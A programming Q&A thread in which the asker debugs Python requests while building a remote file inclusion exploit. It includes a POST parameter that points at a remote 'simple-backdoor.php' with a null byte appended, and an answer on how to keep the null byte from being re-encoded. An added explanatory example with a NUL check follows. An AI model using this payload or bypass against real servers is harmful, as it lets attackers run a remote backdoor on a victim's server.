Lucas Kauffman

Reputation: 6891

Requests is encoding POST parameters when this is not desired

Note that the following pieces of code are used for a remote file inclusion exploit in a controlled environment (not doing anything malicious here).

I'm trying to perform a post request to a URL:

resp = requests.post("http://example.com/test/index.php",data=post_data,cookies=cookie,proxies=proxies,config={'encode_uri': False})

One of the data parameters is a URL which is used for file inclusion; at the end it has a null byte:

http://mysite.org/simple-backdoor.php%00

But what requests is doing is re-encoding the null byte at the end, making it useless:

http%3A%2F%2Fmysite.org%2Fsimple-backdoor.php%2500

I tried appending config={'encode_uri': False} but this results in the same behavior. Does anyone have a clue how to disable this encoding or how to introduce a null byte character which gets encoded to %00?

Upvotes: 3

Views: 542

Answers (1)

Pritam Baral

Reputation: 475

Requests v2.0.0 onwards doesn't have (and thus doesn't respect) encode_uri. It tries to encode data if data isn't a string.

Use a Unicode null byte instead of %00, OR manually encode every component of data and form data as a string.

Upvotes: 2
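The encoding behaviour discussed in this thread, as an added example that is not part of the original question or answer: it uses the standard library's `urlencode` as a stand-in for the form encoding requests applies to a dict passed as `data`, then decodes the body once as a server-side form parser would and checks the field for a NUL character. The field name `page`, the helper names and the example.org values are constructed for illustration.

```python
# Added example (not from the thread). Standard library only: urlencode stands
# in for the form encoding requests applies when `data` is a dict.
from urllib.parse import urlencode, parse_qs


def form_body(value):
    """Form-encode one field; "page" is a constructed field name."""
    return urlencode({"page": value})


def server_view(body):
    """Decode the body once, as a form parser on the receiving side would."""
    return parse_qs(body, keep_blank_values=True)["page"][0]


def has_nul(body):
    """Input check for the receiving side: flag a NUL in the decoded field."""
    return "\x00" in server_view(body)


# Constructed sample values.
LITERAL = "http://example.org/a.php%00"    # the three characters '%', '0', '0'
REAL_NUL = "http://example.org/a.php\x00"  # one actual NUL character

if __name__ == "__main__":
    for value in (LITERAL, REAL_NUL):
        body = form_body(value)
        # Show the wire form, what one decode yields, and the check result.
        print(body, repr(server_view(body)), has_nul(body))
```

The literal text `%00` is percent-encoded a second time on the wire, so one decode on the receiving side returns the text `%00` rather than a NUL; only the value holding a real NUL character is flagged by the check.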
